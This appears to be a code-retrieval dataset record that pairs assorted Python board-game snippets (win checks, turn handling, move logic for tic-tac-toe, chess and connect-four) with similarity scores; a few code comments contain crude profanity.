heuristic_accum = []\r\n heuristic = 0\r\n for c in range(board_size):\r\n close = []\r\n for r in range(board_size):\r\n dlog(str(check_space(r, c)))\r\n if check_space(r, c) == opp_team:\r\n if team == Team.WHITE:\r\n close.append(r)\r\n elif team == Team.BLACK:\r\n close.append(board_size-r-1)\r\n heuristic -= 1\r\n elif check_space(r, c) == team:\r\n heuristic += 1\r\n else:\r\n continue\r\n heuristic_accum.append([heuristic, c])\r\n if close != []:\r\n c_indexes.append(c)\r\n deep = sorted(close)\r\n deep_accum.append(deep[0])\r\n heuristic = 0\r\n close_index = sorted(list(zip(deep_accum, c_indexes)))\r\n for c in close_index:\r\n if c[0] == 0:\r\n continue \r\n col = c[1]\r\n weighted_val = heuristic_accum[col][0]-15\r\n heuristic_accum[col][0] = weighted_val\r\n break\r\n\r\n heuristic_accum = sorted(heuristic_accum)\r\n\r\n for heur in heuristic_accum:\r\n col = heur[1]\r\n if not check_space_wrapper(index, col, board_size) and not check_space_wrapper(index+forward, col+1, board_size) == opp_team and not check_space_wrapper(index+forward, col-1, board_size) == opp_team:\r\n spawn(index, col)\r\n dlog('Spawned unit at: (' + str(index) + ', ' + str(col) + ')')\r\n break\r\n\r\n bytecode = get_bytecode()\r\n dlog('Done! Bytecode left: ' + str(bytecode))", "def win():\r\n\r\n\tglobal turn, tile1, tile2, tile3, tile4, tile5, tile6, tile7, tile8, tile9, move1, move2, player1, player2\r\n\r\n\twin1 = tile1==tile2==tile3==1 or tile1==tile2==tile3==2\r\n\twin2 = tile4==tile5==tile6==1 or tile4==tile5==tile6==2\r\n\twin3 = tile7==tile8==tile9==1 or tile7==tile8==tile9==2\r\n\twin4 = tile1==tile4==tile7==1 or tile1==tile4==tile7==2\r\n\twin5 = tile2==tile5==tile8==1 or tile2==tile5==tile8==2\r\n\twin6 = tile3==tile6==tile9==1 or tile3==tile6==tile9==2\r\n\twin7 = tile1==tile5==tile9==1 or tile1==tile5==tile9==2\r\n\twin8 = tile3==tile5==tile7==1 or tile3==tile5==tile7==2\r\n\r\n\twin = win1 or win2 or win3 or win4 or win5 or win6 or win7 or win8\r\n\treturn win", "def rough_outcome(self) -> float:\n # HUYNH YOU PRICK WHY THE FUCK DO YOU MAKE US WRITE THIS SHIT EVEN IT'S NOT USED ANYWHERE\n # pick move based on this may not be optimal but better than random\n # return 1 if win immediately\n # return -1 if all states reachable will result the other player win\n # return 0 if otherwise ??? 
what the fuck does this mean\n # look two states forward\n pass", "def player_win(self):\n global chips\n global placed_bet\n\n chips = (self.final_bet*2 + chips)\n self.victory = True\n placed_bet = False", "def uber_check_win(self):\n if self.player1.score == self.player2.score:\n print(\"It's a draw!\")\n elif self.player1.score > self.player2.score:\n print(\"Player 1 is a proper bad ass mother fucker\")\n else:\n print(\"Player numma 2 is a proper bad ass mother fucker\")", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #provjere da li su kraljevi ili topovi inicirali pomijeranje\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #provjera da li je neko pojeo topove\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def winner(self):\n raise NotImplementedError", "def winner(self):\n raise NotImplementedError", "def switch_view(self, *args):\n if not self.rightwin.data:\n return\n\n if self.cur == Win.right:\n self.switch_view_left()\n else:\n self.switch_view_right()\n self.leftwin.win.touchwin()", "def setup_winner(self):\n self.winnertime = FPS*4 \n self.wevegotawinner = self.winnertime#how many seconds it shows the winner\n self.winner_radius = max(self.height,self.width)\n self.now = time.time()", "def play_round(self):\r\n your_move = self.you.move()\r\n opposite_move = self.opposite.move()\r\n result = Game.what_move(your_move, opposite_move)\r\n\r\n self.you.learn(opposite_move)\r\n self.opposite.learn(your_move)\r\n\r\n print(\"you choose:\" + your_move + \" and the opposite player choose:\" +\r\n opposite_move)\r\n\r\n if result == 1:\r\n self.you.score += 1\r\n print('=> you won this round!\\n')\r\n elif result == 2:\r\n self.opposite.score += 1\r\n print('=> the opposite pleyer won this round!\\n')\r\n elif result == 0:\r\n print('=> it is Draw!\\n')", "def __take_turn(self,x,y):\n # Take player 1 turn\n if self._player == 1:\n # Return if winner found\n if self.__place_token(\"lightblue\", \"x\", x, y):\n return\n # Take player 2 turn\n elif self._player == 2:\n # Return if winner found\n if self.__place_token(\"lightcoral\", \"o\", x, y):\n return\n # Update board\n if (self._gui): self.__board[x][y].update()\n self.__end_turn()", "def isWin(self):\n\n return self.tiles == self.winCdt", "def next_move(ttt):\r\n # get board in 2D array form\r\n b = ttt.get_board()\r\n \r\n # if there's a winning move, take it\r\n (cfw, win_move) = check_for_win_lose(b)\r\n if cfw is not None:\r\n if win_move:\r\n print 'COMPUTER WINS!'\r\n return cfw, win_move\r\n # otherwise, pres on with the next best move\r\n\r\n # get \"points\" on board. 
this tells us not only the move\r\n # but also who went first\r\n board_count = sum(sum(b,[]))\r\n \r\n # IF COMPUTER HAS FIRST TURN\r\n # if 1st move\r\n if board_count == 0:\r\n return (2,2), False # take the center\r\n # this is not best strategy for winning, but\r\n # it the human messes up, the computer can win.\r\n # taking a corner first makes it a little easier\r\n # for the computer to win becase the human only\r\n # has one correct move to make: to take the center\r\n \r\n # if 3rd move, and not a winning one\r\n if board_count == 3:\r\n if b[0][1]==2 or b[1][0]==2 or b[0][0]==2:\r\n return (3,3), False\r\n elif b[0][2]==2:\r\n return (3,1), False\r\n elif b[2][0]==2:\r\n return (1,3), False\r\n else:#elif b[1][2]==2 or b[2][1]==2 or b[2][2]==2:\r\n return (1,1), False\r\n\r\n # if 5th move, and not a winning or losing one\r\n if board_count == 6:\r\n b5 = numpy.array([[0,2,1],[0,1,0],[2,0,0]])\r\n if (b == b5).all():\r\n return (3,3), False\r\n elif (b == numpy.rot90(b5,1)).all():\r\n return (3,1), False\r\n elif (b == numpy.rot90(b5,2)).all():\r\n return (1,1), False\r\n elif (b == numpy.rot90(b5,3)).all():\r\n return (1,3), False\r\n\r\n b5 = numpy.array([[0,0,1],[0,1,2],[2,0,0]])\r\n if (b == b5).all():\r\n return (1,1), False\r\n elif (b == numpy.rot90(b5,1)).all():\r\n return (1,3), False\r\n elif (b == numpy.rot90(b5,2)).all():\r\n return (3,3), False\r\n elif (b == numpy.rot90(b5,3)).all():\r\n return (3,1), False\r\n\r\n # at this point, all possible boards should have been covered\r\n\r\n # if 7th move, and a winning or losing one\r\n if board_count == 9:\r\n # find the row or col with 2 open slots and mark it\r\n for ri in range(3):\r\n r = b[ri]\r\n if sum([1 if i==0 else 0 for i in r]) == 2:\r\n if r[0] == 0:\r\n return (ri+1,1), False\r\n else:\r\n return (ri+1,2), False\r\n for ci in range(3):\r\n c = get_col(b, ci)\r\n if sum([1 if i==0 else 0 for i in c]) == 2:\r\n if c[0] == 0:\r\n return (1,ci+1), False\r\n else:\r\n return (2,ci+1), False\r\n\r\n \r\n # IF HUMAN HAS FIRST TURN\r\n # if 2nd move\r\n if board_count == 2:\r\n if b[1][1] == 0:\r\n # if the center is open, computer has\r\n # to take it in order to not lose\r\n return (2,2), False\r\n else:\r\n # otherwise take a corner\r\n return (1,1), False\r\n\r\n # if 4th move\r\n if board_count == 5:\r\n # if we took a corner on move 2 and they\r\n # are using computer's offensive strategy\r\n # when it is first player\r\n b4 = [[1,0,0],[0,2,0],[0,0,2]]\r\n if b==b4:\r\n return (3,1), False\r\n # if we took center on move 2\r\n else:\r\n b4 = numpy.array([[2,0,0],[0,1,0],[0,0,2]])\r\n if (b == b4).all() or (b == numpy.rot90(b4,1)).all():\r\n return (1,2), False\r\n\r\n # overall ELSE -- just find a square\r\n for ri in range(3):\r\n for ci in range(3):\r\n if b[ri][ci] == 0:\r\n return (ri+1,ci+1), False", "def check_game_over(self):\n red, blue = self.board.count_piece()\n if blue == 0:\n self.ui.show_result(\"RED WIN!\")\n self.turn = RED\n elif red == 0:\n self.ui.show_result(\"BLUE WIN!\")\n self.turn = BLUE\n elif red == blue == 1:\n self.ui.show_result(\"DRAW!\")", "def _shift_wall_wind(self):\n assert self.wall_wind is not None, 'Please select wall to open first'\n\n wall_index = ALL_WINDS.index(self.wall_wind)\n\n if wall_index == 0:\n wall_index = len(ALL_WINDS) - 1\n else:\n wall_index -= 1\n\n self.wall_wind = ALL_WINDS[wall_index]\n\n return self.wall_wind", "def begin_turn(self):\n pass", "def check_win(self):\n for pos in self.win_set:\n # s would be all 1 if all positions of a winning move is 
fulfilled\n # otherwise 1s and 0s\n s = set([self.grid[p] for p in pos])\n if len(s) == 1 and (0 not in s):\n return True\n return False", "def main():\r\n turn_left()\r\n while front_is_clear():\r\n move()\r\n turn_right()\r\n while front_is_clear():\r\n move()\r\n turn_right()\r\n while front_is_clear():\r\n move()\r\n turn_left()", "def _walk(self):\n new_pos = self.rect.move((self.move, 0)) # move 9 pixel to the right per frame\n if self.rect.left < self.area.left or self.rect.right > self.area.right:\n self.move = -self.move # move to the opposite direction when the chimp position exceeds the screen\n new_pos = self.rect.move((self.move, 0))\n self.image = pygame.transform.flip(\n self.image, 1, 0\n ) # mirror the chimp to make it looks like turning around\n self.rect = new_pos", "def go_to_waiting(self):\n if self.in_front_of_home:\n if self.dock():\n self.in_front_of_home = False\n elif self.goto_goal(self.home_x, self.home_y):\n self.in_front_of_home = True", "def step(self):\n self.turn_on_corners()\n part_1.Grid.step(self)\n self.turn_on_corners()", "def go_home(self):\n self.move_wl(0)", "def check_win(self, color):\n if dijkstra(self, color) == 0:\n return True\n else:\n return False", "def check_left_side():\n maze.turn_right()\n #print 'checked left side'\n if maze.go():\n maze.turn_right()\n maze.turn_right()\n maze.go()\n maze.turn_right()\n # print 'i can go left'\n return True\n else:\n #print \"i can't go left\"\n maze.turn_left()\n return False", "def players_turn(sl):\n move = get_move()\n if move[0]:\n move = move[1]\n else:\n return False\n while sl[move-1].filled:\n print_board(sl)\n print('that spot is full')\n move = get_move()\n sl[move-1].set_x()\n return True", "def _turn(self, player):\n row, column = player.turn(self.board.representation())\n if self.board.move(player.mark, row, column):\n print(self.board)\n print(f'Player {player.mark} has won! :-)')\n return True\n\n if self.board.is_full():\n print(self.board)\n print('Board is full, tie.')\n return True\n\n return False", "def win_game(self):\n wingame = GLabel('YOU WIN! 
:D')\n wingame.font = '-50'\n self.window.add(wingame, x=self.window.width / 6, y=self.window.height * 0.666)", "def turn(self):\r\n # 1 throw the dice\r\n if (\r\n not self.player_list[self.current_player].is_in_jail()\r\n or self.try_leave_jail()\r\n ):\r\n thr = Throw()\r\n while thr is not None:\r\n # check in where the current player will land\r\n new_position = self.compute_new_position_from_dice(\r\n self.current_player, thr\r\n )\r\n self.move_player_to(self.current_player, new_position, thr=thr)\r\n\r\n if thr.is_double():\r\n thr = Throw()\r\n else:\r\n thr = None\r\n print(\"------------------------------\")\r\n\r\n self.player_observable_variables()\r\n\r\n # move turn to next player\r\n self.current_player += 1\r\n if self.current_player >= len(self.player_list):\r\n self.current_player = 0\r\n self.full_turn_count += 1\r\n print(\"**********************\")\r\n print(\r\n \"Full turn:\",\r\n self.full_turn_count,\r\n \"\\n\",\r\n \"\\n\".join(map(lambda x: x.full(), self.player_list)),\r\n )\r\n print(\"**********************\")", "def hasWin(self) :\n comparison = self.compareNumberUser()\n if (comparison == 'equal') :\n return True\n else :\n return False", "def handleWin(self, winningplayer):\n self.board.drawWinBoard(winningplayer, self.istournament)\n self.board = None\n self.ui.game = None\n if self.istournament:\n if winningplayer == 1:\n self.ui.tournament.setWinner(1)\n if winningplayer == -1:\n self.ui.tournament.setWinner(2)\n\n threading.Timer(3, self.ui.displayCurrentTournament).start()", "def check_borders(self):\n # Go Homer!\n # https://en.wikipedia.org/wiki/Torus#Flat_torus\n if self._posn.x < 0:\n self._posn.x += self._win_w\n elif self._posn.x > self._win_w:\n self._posn.x -= self._win_w\n if self._posn.y < 0:\n self._posn.y += self._win_h\n elif self._posn.y > self._win_h:\n self._posn.y -= self._win_h", "def turn(self):\n pass", "def test_get_winner():\n\n board = Board()\n board1 = Board()\n board2 = Board()\n\n # board is empty\n board.find_winner(0)\n assert board.get_winner() == board.EMPTY\n\n # vertical win\n for i in range(4):\n board.move(Board.P1, 1)\n\n for i in range(3):\n board.move(Board.P2, 2)\n board.find_winner(1)\n assert board.get_winner() == board.P1\n\n \"\"\"\n Board looks like:\n \n 0 1 2 3 4 5 6 \n +-+-+-+-+-+-+-+\n 0|-|-|-|-|-|-|-|0\n +-+-+-+-+-+-+-+\n 1|-|-|-|-|-|-|-|1\n +-+-+-+-+-+-+-+\n 2|-|X|-|-|-|-|-|2\n +-+-+-+-+-+-+-+\n 3|-|X|O|-|-|-|-|3\n +-+-+-+-+-+-+-+\n 4|-|X|O|-|-|-|-|4\n +-+-+-+-+-+-+-+\n 5|-|X|O|-|-|-|-|5\n +-+-+-+-+-+-+-+\n 0 1 2 3 4 5 6 \n \"\"\"\n\n # horizontal win\n for i in range(4):\n board1.move(Board.P2, i)\n for i in range(3):\n board1.move(Board.P1, 1)\n board1.find_winner(2)\n assert board1.get_winner() == board.P2\n\n \"\"\"\n Board1 looks like:\n \n 0 1 2 3 4 5 6 \n +-+-+-+-+-+-+-+\n 0|-|-|-|-|-|-|-|0\n +-+-+-+-+-+-+-+\n 1|-|-|-|-|-|-|-|1\n +-+-+-+-+-+-+-+\n 2|-|X|-|-|-|-|-|2\n +-+-+-+-+-+-+-+\n 3|-|X|-|-|-|-|-|3\n +-+-+-+-+-+-+-+\n 4|-|X|-|-|-|-|-|4\n +-+-+-+-+-+-+-+\n 5|O|O|O|O|-|-|-|5\n +-+-+-+-+-+-+-+\n 0 1 2 3 4 5 6 \n \"\"\"\n\n # diagonal win\n\n board2.move(Board.P1, 1)\n board2.move(Board.P2, 2)\n\n board2.move(Board.P1, 2)\n board2.move(Board.P2, 3)\n\n board2.move(Board.P1, 4)\n board2.move(Board.P2, 3)\n\n board2.move(Board.P1, 3)\n board2.move(Board.P2, 5)\n\n board2.move(Board.P1, 4)\n board2.move(Board.P2, 4)\n\n board2.move(Board.P1, 4)\n\n board2.find_winner(1)\n assert board2.get_winner() == board.P1\n\n \"\"\"\n Board 2 looks like\n \n 0 1 2 3 4 5 6 \n +-+-+-+-+-+-+-+\n 
0|-|-|-|-|-|-|-|0\n +-+-+-+-+-+-+-+\n 1|-|-|-|-|-|-|-|1\n +-+-+-+-+-+-+-+\n 2|-|-|-|-|X|-|-|2\n +-+-+-+-+-+-+-+\n 3|-|-|-|X|O|-|-|3\n +-+-+-+-+-+-+-+\n 4|-|-|X|O|X|-|-|4\n +-+-+-+-+-+-+-+\n 5|-|X|O|O|X|O|-|5\n +-+-+-+-+-+-+-+\n 0 1 2 3 4 5 6 \n \"\"\"", "def checkWinner(self, surface):\r\n winner = True\r\n \r\n # Checks for winner\r\n for point in self.points:\r\n if point.getTeam() == self.getTurn():\r\n winner = False\r\n \r\n # Displays winner message if there is a winner\r\n if winner:\r\n self.surface.fill(BLACK)\r\n winText = graphicalObjects.Text(self.getCurrentString() + ' wins!', WIN_CENTER, 20)\r\n winText.draw(self.surface)\r\n pygame.display.flip()\r\n self.won = True", "def wind(self):\n yield self\n e = self.previous.twin\n while e is not self:\n yield e\n e = e.previous.twin", "def check_for_win(self,board, player_id, action):\n\n row = 0\n\n # check which row was inserted last:\n for i in range(ROWS):\n if board[ROWS - 1 - i, action] == EMPTY_VAL:\n row = ROWS - i\n break\n\n # check horizontal:\n vec = board[row, :] == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n\n # check vertical:\n vec = board[:, action] == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n\n # check diagonals:\n vec = np.diagonal(board, action - row) == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n vec = np.diagonal(np.fliplr(board), ACTION_DIM - action - 1 - row) == player_id\n if np.any(np.convolve(WIN_MASK, vec, mode=\"valid\") == 4):\n return True\n\n return False" ]
[ "0.653839", "0.65257937", "0.64947987", "0.6482304", "0.6401277", "0.6380247", "0.62850153", "0.6280651", "0.62673837", "0.6259922", "0.6240374", "0.62018436", "0.62003434", "0.61975145", "0.61953324", "0.6182207", "0.61644655", "0.61555684", "0.61346805", "0.61338586", "0.61147255", "0.6112215", "0.6098094", "0.60818005", "0.60655445", "0.6048322", "0.6018495", "0.6018415", "0.6005664", "0.59894025", "0.59866536", "0.5977511", "0.59680957", "0.59678936", "0.59583604", "0.5928425", "0.59196067", "0.59184474", "0.5906021", "0.5901521", "0.58730245", "0.58657867", "0.5837158", "0.582541", "0.5816516", "0.58111095", "0.58093446", "0.58058167", "0.58031523", "0.57965946", "0.5792889", "0.57872814", "0.57795197", "0.57791144", "0.57753366", "0.57714874", "0.5764824", "0.57622814", "0.57605463", "0.575606", "0.5749543", "0.5746339", "0.5743451", "0.5740116", "0.5734021", "0.57185864", "0.5699795", "0.56962085", "0.569313", "0.5686135", "0.5685103", "0.5685103", "0.567799", "0.56775415", "0.56747395", "0.56741095", "0.567082", "0.5670223", "0.56649673", "0.5662118", "0.5655011", "0.56530833", "0.5650168", "0.56467336", "0.56460655", "0.5641035", "0.56406236", "0.56392455", "0.56369877", "0.5633366", "0.5630172", "0.56286854", "0.56279254", "0.562781", "0.5626715", "0.5624902", "0.56248176", "0.56244504", "0.5622922", "0.56213725", "0.5621106" ]
0.0
-1
Lose by not having any possible valid moves to make
def checkNoMoveLoss(self, moves):
    if not moves:
        winner = "Black" if self.turn[0] == "W" else "White"
        self.endGame(self.turn + " has nowhere to move. " + winner + " wins!\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def any_legal_move(self, player, board):\r\n moves = self.legal_moves(player, board)\r\n #print(moves)\r\n return len(moves)!=0", "def get_valid_moves(self):\r\n # castling and en-passant rights are stored, because move affects these values\r\n temp_enpassant_possible = self.enpas_pos\r\n temp_castle = CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs)\r\n\r\n # for validating a possible move\r\n #1 all possibile moves are generated\r\n #2 each pos moves are made\r\n #3 generate opponent move\r\n #4 check if any of those moves let the king attacked\r\n #5 moves which let the king in chess are eliminated\r\n #6 the moves are undone\r\n moves = self.get_all_possible_moves() # 1\r\n\r\n # castle moves are directly introduced in valid moves\r\n if not self.turn_white:\r\n self.get_castle_moves(self.bKingPos[0], self.bKingPos[1], moves)\r\n else:\r\n self.get_castle_moves(self.wKingPos[0], self.wKingPos[1], moves)\r\n\r\n for i in range(len(moves) - 1, -1, -1): # 2\r\n self.make_move(moves[i])\r\n # 3 #4\r\n self.turn_white = not self.turn_white\r\n if self.in_check():\r\n moves.remove(moves[i]) # 5\r\n self.turn_white = not self.turn_white\r\n self.undo_move()\r\n\r\n # game ending possibilities\r\n if len(moves) == 0:\r\n if self.in_check():\r\n self.checkMate = True\r\n print(\"Checkmate !\")\r\n else:\r\n self.staleMate = True\r\n print(\"Stalemate !\")\r\n else:\r\n self.checkMate = False\r\n self.staleMate = False\r\n\r\n # the rigths are restored, and the values are not affected\r\n self.enpas_pos = temp_enpassant_possible\r\n self.cr_castle_r = temp_castle\r\n\r\n return moves", "def test_no_moves(self):\n game = self.ending(['bw..wwww'], 8, 1)\n game.man_move(0, 2)\n self.assertEqual(game.finish_state,\n (400, game.first_player, 'No moves'))", "def unmakeMove(self, move):", "def move_valid(move):\n return True", "def get_legal_moves(self):\n # for each square in the castle figure out if an moves can occur from it.\n moves = []\n allowed = [self.turn]\n if self.turn == DEFENDER:\n allowed.extend((KING, CASTLE_OCCUPIED))\n it = np.nditer(self.board_state, flags=['multi_index'])\n while not it.finished:\n index = it.multi_index\n curr_loc = it[0]\n if curr_loc in allowed:\n moves.extend(self.get_legal_move_piece(curr_loc, index))\n it.iternext()\n return moves", "def get_legal_moves(self, board):\n moves = set()\n capture_moves = set()\n for move in self.pot_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if self.path_clear(board, move, target_row, target_col):\n if board.status[target_row, target_col] * self.color_value == 0:\n moves.add(move)\n if board.status[target_row, target_col] * self.color_value < 0:\n capture_moves.add(move)\n self.legal_moves = moves\n self.legal_capture_moves = capture_moves", "def legal_moves():\n\tlegal_moves = (\"r\", \"p\", \"s\")\n\treturn legal_moves", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = 
False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def check_illegal_move(self, player, action):\n available_actions = self.filter_actions(player)\n if action not in available_actions:\n print('Illegal move! Please choose another move!')\n return False\n return True", "def get_legal_moves(self, board):\n moves = set()\n capture_moves = set()\n for move in self.pot_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if not (target_row > 7 or target_row < 0 or target_col > 7 or target_col < 0):\n if board.status[target_row, target_col] == 0:\n moves.add(move)\n if board.status[target_row, target_col] * self.color_value < 0:\n capture_moves.add(move)\n self.legal_moves = moves\n self.legal_capture_moves = capture_moves", "def get_legal_moves(self, board):\n moves = set()\n capture_moves = set()\n if not (self.field_row*self.color_value == 1 or self.field_row*self.color_value == -6):\n self.pot_moves = {(1*self.color_value, 0)}\n\n for move in self.pot_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if self.path_clear(board, move, target_row, target_col):\n if board.status[target_row, target_col] * self.color_value == 0:\n moves.add(move)\n\n for move in self.pot_capture_moves:\n target_row = self.field_row + move[0]\n target_col = self.field_col + move[1]\n if self.path_clear(board, move, target_row, target_col):\n if board.status[target_row, target_col] * self.color_value < 0:\n capture_moves.add(move)\n self.legal_moves = moves\n self.legal_capture_moves = capture_moves", "def get_untried_moves(self, legal_moves):\n\n\t\t# Find all moves for which this node *does* have children\n\t\ttried_moves = [child.move for child in self.child_nodes]\n\n\t\t# Return all moves that are legal but have not been tried yet\n\t\treturn [move for move in legal_moves if move not in tried_moves]", "def report_invalid_move(self, move: BotMove):\n self.invalid_moves.append((self.round, self.turn, move))", "def test_valid_move(self, move):\n if self.game_state[move[0]][move[1]] is not None:\n return False\n return True", "def legal_moves_generator(self, custom=False):\r\n possible_moves = self.null_positions\r\n possible_moves.add('PASS')\r\n temp_state = np.array(self.state)\r\n illegal_moves = set()\r\n for pos in possible_moves:\r\n illegal = True\r\n if pos != 'PASS':\r\n ortho = ORTHOGONAL_POSITIONS[(pos[0], pos[1])]\r\n for p in ortho:\r\n if self.state[p[0]][p[1]] == 0:\r\n illegal = False\r\n break\r\n elif 
self.to_move != self.board[p[0]][p[1]].color:\r\n if self.board[p[0]][p[1]].liberty == 1:\r\n illegal = False\r\n break\r\n\r\n elif self.state[p[0]][p[1]] == self.to_move:\r\n if self.board[p[0]][p[1]].liberty > 1:\r\n illegal = False\r\n break\r\n if illegal:\r\n illegal_moves.add(pos)\r\n temp_state = np.array(self.state)\r\n continue\r\n\r\n for p in ortho:\r\n if self.to_move != self.board[p[0]][p[1]].color:\r\n if self.board[p[0]][p[1]].liberty == 1:\r\n temp_state[p[0]][p[1]] = 0\r\n\r\n temp_state[pos[0]][pos[1]] = self.to_move\r\n if (temp_state == self.previous_state).all(): # KO RULE CHECK\r\n illegal_moves.add(pos)\r\n temp_state = np.array(self.state)\r\n continue\r\n temp_state = np.array(self.state)\r\n\r\n possible_move_pos = possible_moves - illegal_moves\r\n if custom:\r\n return possible_move_pos\r\n\r\n legal_moves_queue = PriorityQueue()\r\n\r\n for possible_move in possible_move_pos:\r\n move_obj = Move(possible_move, self.to_move, self)\r\n legal_moves_queue.put((-move_obj.priority, move_obj))\r\n return legal_moves_queue", "def safemoves():\n safe = []\n \n for move in board.moves():\n if board.rel(move) not in board.adjacent(board.them()):\n if any(map(board.passable,board.adjacent(board.rel(move)))):\n safe.append(move)\n\n\n if DEBUG:\n log.write(\"me\" + repr(board.me()) + \"\\n\")\n log.write(\"them\" + repr(board.them()) + \"\\n\")\n log.write(\"moves\"+ repr(board.moves()) + \"\\n\")\n log.write(\"safemoves\"+ repr(safe) + \"\\n\")\n return safe", "def is_legal(self, move, player, board):\r\n if(self.is_valid(move)==False):\r\n return False\r\n if(board[move]!=core.EMPTY):\r\n return False\r\n return True", "def make_legal_move(move, board, start, end, move_number, en_passant_square, king_w, king_b, rook_w_l, rook_w_r,\n rook_b_l,\n rook_b_r, promotion_piece):\n # this function should have essentially what i had in main at first without making the move\n test_board = board.copy()\n valid_move = False\n piece = find_piece(board, start)\n end_piece = find_piece(board, end)\n\n if switch_player(move_number): # for whites move\n if (65 <= ord(piece) <= 90) and (validate_move(board, end, move_number)):\n if piece == \"P\":\n if pawn(board, start, end, move_number):\n if end[0] == 8:\n promotion(test_board, start, end, promotion_piece)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n promotion(board, start, end, promotion_piece)\n return True\n else:\n valid_move = False\n else:\n valid_move = True\n else:\n if can_en_passant(board, en_passant_square, end, start, move_number):\n execute_enpassant(test_board, start, end, move_number)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n execute_enpassant(board, start, end, move_number)\n return True\n else:\n return False\n elif piece == \"K\":\n if king(start, end):\n if controlled_squares(board, move_number, end):\n valid_move = True\n elif piece == \"N\":\n if knight(start, end):\n valid_move = True\n elif piece == \"B\":\n if bishop(board, start, end):\n valid_move = True\n elif piece == \"Q\":\n if queen(board, start, end):\n valid_move = True\n elif piece == \"R\":\n if rook(board, start, end):\n valid_move = True\n else:\n valid_move = False\n if valid_move:\n update_board(test_board, start, end)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n update_board(board, start, end)\n return True\n else:\n retract_move(test_board, start, end, end_piece)\n print(\"Illegal Move\")\n return 
False\n if not switch_player(move_number):\n if (97 <= ord(piece) <= 122) and validate_move(board, end, move_number):\n if piece == \"p\":\n if pawn(board, start, end, move_number):\n if end[0] == 1:\n promotion(test_board, start, end, promotion_piece)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n promotion(board, start, end, promotion_piece)\n return True\n else:\n valid_move = False\n else:\n valid_move = True\n else:\n if can_en_passant(board, en_passant_square, end, start, move_number):\n execute_enpassant(test_board, start, end, move_number)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n execute_enpassant(board, start, end, move_number)\n return True\n else:\n valid_move = False\n elif piece == \"k\":\n if king(start, end):\n if controlled_squares(board, move_number, end):\n valid_move = True\n elif piece == \"n\":\n if knight(start, end):\n valid_move = True\n elif piece == \"b\":\n if bishop(board, start, end):\n valid_move = True\n elif piece == \"q\":\n if queen(board, start, end):\n valid_move = True\n elif piece == \"r\":\n if rook(board, start, end):\n valid_move = True\n else:\n valid_move = False\n if valid_move:\n update_board(test_board, start, end)\n if not check(test_board, move_number):\n retract_move(test_board, start, end, end_piece)\n update_board(board, start, end)\n return True\n else:\n retract_move(test_board, start, end, end_piece)\n print(\"Illegal Move\")\n return False", "def is_legal_move(self, current_player, move):\n\t\tstarting_pos = move[0]\n\t\tending_pos = move[1]\n\t\tif ending_pos[0] not in range(self.board_size) or ending_pos[1] not in range(self.board_size):\t# Discard any generated moves that fall off of the board\n\t\t\treturn False \n\t\tif self.board.repr[starting_pos[0]][starting_pos[1]]!=self.player_symbol[current_player]:\n\t\t\tprint \"this should never trigger and is redundant\"\n\t\t\treturn False\n\t\tif self.board.repr[ending_pos[0]][ending_pos[1]]!= '.':\t# Check that landing spot is empty\n\t\t\treturn False\n\t\tmiddle_pos = (starting_pos[0]-(starting_pos[0]-ending_pos[0])/2,starting_pos[1]-(starting_pos[1]-ending_pos[1])/2)\t# Check the middle spot is the other piece - this should in theory not matter because the pieces alternate\n\t\tother_player = 1 - current_player \n\t\tif 